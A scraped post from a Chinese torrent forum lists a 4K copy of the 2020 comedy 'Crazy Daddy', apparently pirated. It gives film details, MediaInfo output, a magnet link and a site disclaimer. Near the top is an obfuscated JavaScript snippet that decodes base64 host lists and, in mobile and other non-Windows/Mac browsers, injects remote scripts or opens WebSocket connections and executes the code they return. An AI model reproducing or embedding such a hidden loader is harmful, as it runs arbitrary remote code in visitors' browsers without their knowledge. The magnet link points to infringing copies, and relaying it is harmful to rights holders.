疯狂老爹.Crazy.Daddy.2020.WEB-DL.4K.H265.AAC 10.75GB

版主小s 1月前 212

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 疯狂老爹 / Crazy Daddy
◎年  代 2020
◎产  地 中国大陆
◎类  别 剧情 / 喜剧 / 运动
◎语  言 汉语普通话
◎上映日期 2020-04-05(中国大陆)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣评分 5.2/10 (837人评价)
◎豆瓣链接 https://movie.douban.com/subject/35017520/
◎导  演 曹华 Hua Cao (id:1397916)
◎编  剧 刘贺 He Liu (id:1431643)
◎演  员 杨轶 Yi Yang (id:1342478)
       潘长江 Changjiang Pan (id:1274247)
       南吉 Gaowa Siqin (id:1317409)

◎标  签 喜剧励志 / 喜剧 / 运动 / 国产 / 大陆 / 2020 / 值得一看,青春励志 / 网大

◎简  介
  本片是一部农村励志喜剧,讲述了退役运动员肖力在父亲的“激励”下,带领村中女童足球队赢得比赛挽救学校的故事。该片展现了人们为了美好生活共同奋斗中的亲情,爱情,师生情等动人情谊,表达了努力踏实向上就能获得美好人生的思想内涵。

  1. ##### MediaInfo ######

  2. General

  3. Complete name                            : [email protected]

  4. Format                                   : MPEG-4

  5. Format profile                           : Base Media

  6. Codec ID                                 : isom (isom/iso2/mp41)

  7. File size                                : 10.7 GiB

  8. Duration                                 : 1 h 31 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 16.8 Mb/s

  11. Writing application                      : Lavf58.30.100


  12. Video

  13. ID                                       : 1

  14. Format                                   : HEVC

  15. Format/Info                              : High Efficiency Video Coding

  16. Format profile                           : [email protected]@High

  17. Codec ID                                 : hev1

  18. Codec ID/Info                            : High Efficiency Video Coding

  19. Duration                                 : 1 h 31 min

  20. Bit rate                                 : 16.6 Mb/s

  21. Width                                    : 3 840 pixels

  22. Height                                   : 2 160 pixels

  23. Display aspect ratio                     : 16:9

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 24.000 FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 8 bits

  29. Bits/(Pixel*Frame)                       : 0.084

  30. Stream size                              : 10.7 GiB (99%)

  31. Codec configuration box                  : hvcC


  32. Audio

  33. ID                                       : 2

  34. Format                                   : AAC LC

  35. Format/Info                              : Advanced Audio Codec Low Complexity

  36. Codec ID                                 : mp4a-40-2

  37. Duration                                 : 1 h 31 min

  38. Bit rate mode                            : Variable

  39. Bit rate                                 : 125 kb/s

  40. Maximum bit rate                         : 129 kb/s

  41. Channel(s)                               : 2 channels

  42. Channel layout                           : L R

  43. Sampling rate                            : 44.1 kHz

  44. Frame rate                               : 43.066 FPS (1024 SPF)

  45. Compression mode                         : Lossy

  46. Stream size                              : 81.9 MiB (1%)

  47. Default                                  : Yes

  48. Alternate group                          : 1



TAGS 剧情 喜剧 运动

磁力链:
  • magnet:?xt=urn:btih:16F9095F6C755A9F79E915E14A5E5D8E0FCBA2B9
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回